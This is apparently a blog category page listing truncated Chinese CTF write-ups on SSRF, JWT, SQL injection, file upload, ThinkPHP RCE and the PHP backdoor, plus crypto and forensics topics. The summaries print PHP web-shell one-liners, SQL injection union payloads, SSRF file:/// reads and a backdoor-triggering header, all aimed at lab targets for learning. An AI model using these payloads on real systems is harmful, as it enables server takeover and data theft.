CTF
文章平均质量分 89
Atkxor
小白
展开
-
CTFHub-Web-SSRF练习
这里写自定义目录标题内网访问伪协议读取文件端口扫描POST请求上传文件FastCGI协议内网访问题目描述:尝试访问位于127.0.0.1的flag.php吧访问靶机地址,发现url后面多了/?url=_然后访问127.0.0.1/flag.phpPayload: ?url=127.0.0.1/flag.php伪协议读取文件题目描述:尝试去读取一下Web目录下的flag.php吧在SSRF中常用的伪协议是file:///协议,其在ssrf中可以用来读取php源码。Payload原创 2021-10-18 20:31:53 · 6699 阅读 · 2 评论 -
CTFHub-Web进阶-JWT练习
什么是JWTJWT的结构CTFHub-Web-JWT练习敏感信息泄露什么是JWTJson web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC7519)。该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直接被用于认证,也可被加密。JWT的结构.原创 2021-07-25 18:39:05 · 3376 阅读 · 2 评论 -
CTFHub-Web-sql注入练习(二)
布尔盲注Length()函数 返回字符串的长度Substr()截取字符串,有三个参数,第一个是要截取的字符串,第二个是从第几个字符开始,第三个是一次截取多少个字符ascii() 字符的ASCII码值大佬脚本import requestsimport timeurlOPEN = 'http://challenge-b4d99096934b4134.sandbox.ctfhub.com:10080/?id='starOperatorTime = [] mark = 'query_succ原创 2021-07-23 17:49:17 · 466 阅读 · 1 评论 -
Volatility内存取证
目录安装Volatility工具介绍CTF实战安装Volatility新版kali不自带Volatility,需要自己安装源码编译1.下载源码https://pan.baidu.com/s/1r-9VC3aG-sP6wWziYNvXxA 提取码:4d4w2.安装依赖crypto库安装安装pycryptodomepip2 install pycryptodome -i https://pypi.tuna.tsinghua.edu.cn/simple#如果不指定国内源,可能会出现超原创 2021-06-03 21:02:15 · 3946 阅读 · 4 评论 -
ISCC2021 Web WP
目录WebISCC客服冲冲冲(一)这是啥Web01登录which is the true isccMISCRetrieve the passcode海市蜃楼-1WebISCC客服冲冲冲(一)又到了一年一度的ISCC,客服一号为了保住饭碗(被迫)参与了今年的客服海选投票。经过激烈的角逐,客服一号终于凭借着自己多年的客服经验来到决赛的舞台,却发现对手竟是自己???请帮助真正的客服一号在投票中取胜,保住客服一号的饭碗!题目入口:http://39.96.91.106:7020这是啥这是什么东西呢?原创 2021-05-27 20:26:07 · 2008 阅读 · 1 评论 -
ISCC2021 MISC WP
目录MISCMISC1 - Retrieve the passcodeMISC2 - 海市蜃楼-1MISC3 - 我的折扣是多少MISC4 - 区块链MISC5 - Hack the VictimMISC6 - 变异的SM2MISC7- 混乱的音频MISCMISC1 - Retrieve the passcodeScatter说他能解开这个古怪的密码,你呢?来试试吧!Flag格式:ISCC{XXX},XXX为小写字符串,不包括空格xyz.txt1:3:1 1.25:3:1 1.5:3:1原创 2021-05-26 00:06:53 · 3965 阅读 · 1 评论 -
浅析条件竞争漏洞
目录0x00-前言0x01-基础知识0x02-漏洞分析0x03-CTF中的条件竞争0x00-前言条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同用户的请求时是并发进行的。开发者在进行代码开发时常常倾向于认为代码会以线性的方式执行,而且他们忽视了并行服务器会并发执行多个线程,这就会导致意想不到的结果,简而言之就是并没有考虑线程同步。因此,如果并发处理不当或相关操作逻辑顺序设计的不合理时,将会导致此类问题的发生。0x01-基础知识先来了解一下关于条件竞争的基础知识条件竞争:系统中,最小的运算原创 2021-05-23 22:05:15 · 3199 阅读 · 3 评论 -
CISCN2021赛后复现
esay_sql输入单引号报错uname=admin&passwd=123456'&Submit=%E7%99%BB%E5%BD%95#You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''123456'') LIMIT 0,1' at line 1sqlma原创 2021-05-21 22:26:42 · 2104 阅读 · 15 评论 -
PNG隐写入门赛
这里写自定义目录标题One PieNG 1One PieNG 2One PieNG 3One PieNG 4One PieNG 5One PieNG 6One PieNGOne PieNGOne PieNGOne PieNGOne PieNGOne PieNGOne PieNGOne PieNG 13One PieNG 1One PieNG 1One PieNG 1One PieNG 1One PieNG 1One PieNG 17One PieNG 18One PieNG 1文件名称One PieN原创 2021-04-23 17:07:39 · 1544 阅读 · 0 评论 -
USB流量分析
鼠标流量流量包bingbing.pcapng,USB流量tshark提取USB流量tshark -r bingbing.pcapng -T fields -e usb.capdata > usbdata.txt 剔除空行tshark -r bingbing.pcapng -T fields -e usb.capdata | sed '/^\s*$/d' > usbdata.txt利用脚本加上冒号f=open('usbdata.txt','r')fi=open('out.原创 2021-04-12 20:08:07 · 6421 阅读 · 2 评论 -
HTTP请求走私漏洞
这里写自定义目录标题[RoarCTF 2019]Easy Calccalc.php代码<?phperror_reporting(0);if(!isset($_GET['num'])){ show_source(__FILE__);}else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];原创 2021-04-11 21:52:10 · 5630 阅读 · 1 评论 -
深入学习HTTP协议
目录HTTP协议统一资源定位符URL的格式使用HTTP 的URLHTTP协议发展史HTTP/0.9HTTP/1.0HTTP/1.1HTTP/2Request请求请求报文请求方法其他字段Response响应响应报文响应状态码HTTP协议超文本传输协议 (HTTP-Hypertext transfer protocol) 是一种详细规定了浏览器和万维网服务器之间互相通信的规则,通过因特网传送万维网文档的数据传送协议。通常,由HTTP客户端发起一个请求,建立一个到服务器指定端口(默认是80端口)的TCP连接。原创 2021-04-11 14:30:15 · 732 阅读 · 0 评论 -
虎符+红明谷+ctfshow渔人杯赛后复现
目录标题虎符CTFWeb-签到MISC-你会日志分析吗红明谷CTFWeb-write_shellMISC-我的心是冰冰的ctfshow渔人杯签到抽奖感受下气氛神仙姐姐阿拉丁迷飘啊飘简单二维码我跟你拼了虎符CTFWeb-签到参考详细分析PHP源代码后门事件及其供应链安全启示根据文章提示,添加恶意请求头User-Agentt: zerodiumphpinfo();可以看到phpinfo内容继续构造,查看根目录下的文件User-Agentt: zerodiumsystem('ls /');原创 2021-04-05 21:40:02 · 1485 阅读 · 2 评论 -
CTFshow-Web入门-信息泄露
信息泄露WEB 1 源码泄露WEB 2 前台JS绕过WEB 3 协议头信息泄露WEB 4 robots后台泄露WEB 5phps源码泄露WEB 6 源码压缩包泄露WEB 7 版本控制泄露源码WEB 8 版本控制泄露源码2WEB 9WEB 10WEB 11WEB 12WEB 13WEB 14WEB 15WEB 16WEB 17WEB 18WEB 19 前端密钥泄露WEB 20信息泄露WEB 1 源码泄露题目描述:开发注释未及时删除查看源代码,得到flagWEB 2 前台JS绕过题目描述:js前台.原创 2021-03-26 22:28:01 · 4026 阅读 · 2 评论 -
PHP文件包含漏洞
1.超链接应用场景:主要实现网站(web应用)内部跳转、网站之间的跳转语法:<a href="链接地址" target="_blank|_self|_parent|_top">内容</a>target的值值描述_blank在新窗口中打开被链接文档。_self默认。在相同的框架中打开被链接文档。_parent在父框架集中打开被链接文档。_top在整个窗口中打开被链接文档。(1)创建超链接,连接到百度<a hre原创 2020-09-25 21:44:05 · 1080 阅读 · 0 评论 -
ThinkPHP 5命令执行漏洞复现
漏洞简介ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。漏洞描述Thinphp团队在实现框架中的核心类Requests的method方法实现了表单请求类型伪装,默认为$_POST[‘_method’]变量,却没有对$_POST[‘_method’]属性进行严格校验,可以通过变原创 2021-02-09 20:16:42 · 778 阅读 · 0 评论 -
BUUCTF-极客大挑战2019
[极客大挑战2019]Http[极客大挑战2019]upload将里面的内容改为一句话木马GIF89a<script language="php">eval($_POST['shell']);</script> /upload/test.phtml[极客大挑战2019]PHP访问靶机地址提到了备份网站,直接访问www.zip文件,flag.php里面有个假的flag查看一下index.php,发现要用get方式提交参数select再查看class.php原创 2021-01-27 12:09:13 · 696 阅读 · 1 评论 -
CTFHub-Web-RCE练习
1原创 2021-01-16 16:12:47 · 685 阅读 · 1 评论 -
2020金盾信安杯wp
CRYPTObase内容:链接: https://pan.baidu.com/s/18oejcVD2ywcSuHo5mqTP1A 密码: hbg4base64转图片扫码得F#S<YReBy{f.WwU{CSv^e^'n*DBase92解码MISC注意数字内容:链接: https://pan.baidu.com/s/14yqufylp_V4iviXUQLm4Nw 密码: k0ji3 9仿射密码小火龙冲啊内容:链接: https://pan.baidu.com/s/1_Te原创 2020-12-22 22:06:57 · 1336 阅读 · 1 评论 -
极客大挑战2020wp
Crypto二战情报员刘壮简介:你能知道刘壮在说什么?得到的flag包裹上SYC{} .-…/.----/…-/–…/…/…-/…-/-./–./…–.-/…/…–.-/–…/.----/-.–/.----提示:刘壮早上起床打摩丝提交flag,发现错误,转换成小写还是不对,查看了一下群里给的hint,成功提交铠甲与萨满简介:YEI{roafnagtmroafnagtm_hgtmhgtmhgtm}提示:kaisa?偏移量为6时,得到flagMISC一“页”障目作者:lingze简原创 2020-11-29 23:14:06 · 1509 阅读 · 0 评论 -
CTFHub-Web-文件上传练习
无验证上传一句话木马1.php <?php @eval($_POST["pass"]);?> 上传文件相对路径upload/1.php使用蚁剑连接,连接密码为pass查看目录,flag就在这里前端验证上传一句话木马,结果提示该文件不允许上传题目是前端验证,直接查看网页源代码,发现只能上传.jpg,.png,.gif三种格式的文件把1.php改为1.jpg,然后上传抓包1.jpg再改为1.php,然后放包上传成功,得到相对路径upload/1.php还原创 2020-11-22 19:46:56 · 2143 阅读 · 1 评论 -
记一道题的三种注入姿势
ctfshow-web2提示: 最简单的SQL注入手工注入用万能密码1' or 1=1#,登陆成功判断字段数,select 1,2,3有回显,select 1,2,3,4时无回显,说明字段为31' or 1=1 union select 1,2,3 #爆数据库,当前数据库为web21' or 1=1 union select 1,database(),3 #爆表名,有一个flag表1' or 1=1 union select 1,group_concat(table_name)原创 2020-11-16 16:37:20 · 541 阅读 · 0 评论 -
CTFHub-Web-sql注入练习
目录整数型注入字符型注入整数型注入1.判断注入输入1输入?id=1 and 1=1,正常回显输入?id=1 and 1=2,返回错误。2.判断字段数当?id=1 order by 2 时回显正常,当?id=1 order by 3时无回显,所以字段数为23.爆数据库名,当前数据库名为sqli?id=1 and 1=2 union select 1,database()4.爆表名,有两个表,一个是news,另外一个是flag?id=1 and 1=2 union select原创 2020-11-15 12:53:30 · 767 阅读 · 0 评论 -
CTF刷题05
[SUCTF 2019]EasySQL访问题目地址随便输入个123456,点击提交输入*,什么也不返回再输入' or '1'='1尝试了很久没有头绪,看了一下大师傅们的wp,发现原来考查的是堆叠注入和命令执行,又get了新知识。提交1;show databases;#提交1;show tables; #,可以看到有一个Flag表提交 1;select * from Flag;# ,出现Nonono可以知道存在过滤,过滤了from,使用burpsuite进行fuzz,这些都被过原创 2020-11-08 17:59:26 · 803 阅读 · 0 评论 -
代码审计之弱类型绕过
1.extract变量覆盖<?php$flag='xxx';extract($_GET);if(isset($shiyan)){$content=trim(file_get_contents($flag));if($shiyan==$content){echo'flag{xxx}';}else{echo'Oh.no';}}?>在第三行, 运用了ext...原创 2020-11-04 12:54:23 · 1440 阅读 · 0 评论 -
CTFHub-Web-信息泄露练习
PHPINFO访问网址,点击绿色按钮发现是phpinfo.php按ctrl+F搜索flag原创 2020-10-24 23:55:23 · 1424 阅读 · 0 评论 -
CTF刷题04
RSA1这道题属于已知p、q、dp、dq、c求明文类型上脚本p = 8637633767257008567099653486541091171320491509433615447539162437911244175885667806398411790524083553445158113502227745206205327690939504032994699902053229 q = 1264067497399647276917604793717088342092705082148001058159原创 2020-10-11 11:11:20 · 3258 阅读 · 1 评论 -
RSA算法详解与练习
RSA算法1.随机选择两个不相等的质数p和q。2.计算p和q的乘积n(n=pq),n的长度就是密钥长度。3.计算n的欧拉函数φ(n): φ(n) = (p-1)(q-1)4.随机选择一个整数e,也就是公钥当中用来加密的那个数字 条件是1< e < φ(n),且e与φ(n) 互质。5.计算e对于φ(n)的模反元素d。也就是密钥当中用来解密的那个数字所谓"模反元素"就是指有一个整数d,可以使得ed被φ(n)除的余数为1,ed ≡1 (mod φ(n)) 。6.将n和e封装成公钥,n和d原创 2020-10-04 20:57:35 · 6476 阅读 · 3 评论 -
CTF刷题03
头等舱访问题目链接还真是什么也没有,查看源码抓包一下看看查看一下Response,果然flag在这。你必须让他停下访问题目网址,发现网页一直在跳动查看网页源码直接进行抓包,抓到的包大部分是这种404 Not Found包。调整一下思路,从长度入手,查看length最大的包查看源码,flag就出来了...原创 2020-10-04 11:49:53 · 865 阅读 · 0 评论 -
CTF刷题02
掀桌子题目描述:菜狗截获了一份报文如下c8e9aca0c6f2e5f3e8c4efe7a1a0d4e8e5a0e6ece1e7a0e9f3baa0e8eafae3f9e4eafae2eae4e3eaebfaebe3f5e7e9f3e4e3e8eaf9eaf3e2e4e6f2,生气地掀翻了桌子(╯°□°)╯︵ ┻━┻分析这一串字符串,发现由a-z的字母和数字组合而成,我们将字符串整理一下,可以看出是16进制数,其中一组十六进制数fa转化为十进制数是250,所以将每组十六进制数转化为十进制后再减去128原创 2020-09-27 20:33:27 · 1153 阅读 · 0 评论 -
CTF刷题01
1.2.3.4. 转轮机加密题目描述:你俩继续往前走,来到了前面的下一个关卡,这个铺面墙上写了好多奇奇怪怪的 英文字母,排列的的整整齐齐,店面前面还有一个大大的类似于土耳其旋转烤肉的架子,上面一圈圈的 也刻着很多英文字母,你是一个小历史迷,对于二战时候的历史刚好特别熟悉,一拍大腿:“嗨呀!我知道 是什么东西了!”。提示:托马斯·杰斐逊。 flag,是字符串,小写。下载附件按照密钥顺序排列再按照密文提示的字母进行反转再将大写转换成小写即为flag5. give_you_flag题目描原创 2020-09-20 22:07:17 · 709 阅读 · 0 评论 -
CTF题记
1. baby_web题目描述:想想初始页面是哪个访问网址,就是一个大写的HELLO WORLDF12查看源码,发现并没有隐藏什么提示说想想初始页面是哪个,访问url+index.php,结果发现访问的还是url+1.php使用火狐浏览器的开发者选项,点击网络,查看消息头,发现index.php的location参数被设置了1.php,蓝色箭头所指即为flag2. Training-WWW-Robots访问网址,一大串英文翻译一下意思大概是这道题可以让你了解机器查询的标准,和rob原创 2020-08-12 10:26:40 · 518 阅读 · 0 评论 -
攻防世界-MISC新手区
1. base64÷4下载附件,打开文件由题目名字可知是Base16,解密可得到flag2. 神奇的Modbus下载附件,用010 Editor打开原创 2020-08-09 11:31:05 · 428 阅读 · 0 评论 -
SQL注入——布尔注入
布尔注入利用返回真假的效果做到 SQL 注入如:String sql = null;sql = "select * from user where username = " + "'" + a + "'" + "and password = " + "'" + b + "'";#a 和 b 都是 String 类型的变量,这是一个很明显的 SQL 注入漏洞。String a = "admin' or 1 = 1 -- "String b = abc最终发送到数据库的语句就是select原创 2020-07-29 08:57:39 · 738 阅读 · 0 评论 -
攻防世界-CRYPTO新手区
1. base64下载附件Base64解密2. Caesar下载附件凯撒密码解密,当位移为12时得到flag3. Morse下载附件摩斯密码 1替换成-,0替换成.运用一个简单脚本实现转化morse="11 111 010 000 0 1010 111 100 0 00 000 000 111 00 10 1 0 010 0 000 1 00 10 110"morse=morse.replace("1","-")morse=morse.replace("0",".")原创 2020-07-24 18:49:43 · 502 阅读 · 0 评论 -
CTF-CRYPTO总结
1.Quoted-printable直接上来就是一串字符串,于是我就百度了一下Quoted-printableQuoted-printable可译为“可打印字符引用编码”,编码常用在电子邮件中,如:Content-Transfer-Encoding: quoted-printable ,它是MIME编码常见一种表示方法! 在邮件里面我们常需要用可打印的ASCII字符 (如字母、数字与"="...原创 2020-03-29 18:08:43 · 1639 阅读 · 0 评论 -
ISCC2020部分wp
1. LSB下载压缩包,解压得到一个图片用Stegsolve打开,进行异或在通道为0时发现了异常将所有通道设为0,然后保存为flag.png打开图片,发现是二维码扫描后得到cumtctf{1sb_i4_s0_Ea4y}2.原创 2020-07-10 15:38:25 · 859 阅读 · 0 评论 -
CTF-MISC总结
ZIP文件格式50 4B 03 04:这是头文件标记(0x04034b50)14 00:解压文件所需 pkware 版本00 00:全局方式位标记(有无加密)08 00:压缩方式 20 9E:最后修改文件时间66 4F:最后修改文件日期F2 1B 0F 4A:CRC-32校验(4A0F1BF2)0E 00 00 00:压缩后尺寸0C 00 00 00:未压缩尺寸08 00:文...原创 2020-04-20 21:40:24 · 11004 阅读 · 3 评论 -
Hexo个人博客搭建历程
1.看图片属性根据提示,找到图片属性,flag就出来了2.SL就隐藏在字节中把图片放入010editor中,在文本中搜索SL{3.修改图片宽或高打开图片,发现图片不全在属性中找到图片的像素大小打开该文件第二行前四位表示图片的宽,后四位表示图片的高。十六进制的045F为十进制的1119,十六进制的200为十进制的512发现像素大小与属性一致,于是把高跟宽改成同一大小保...原创 2020-04-07 11:29:34 · 1271 阅读 · 0 评论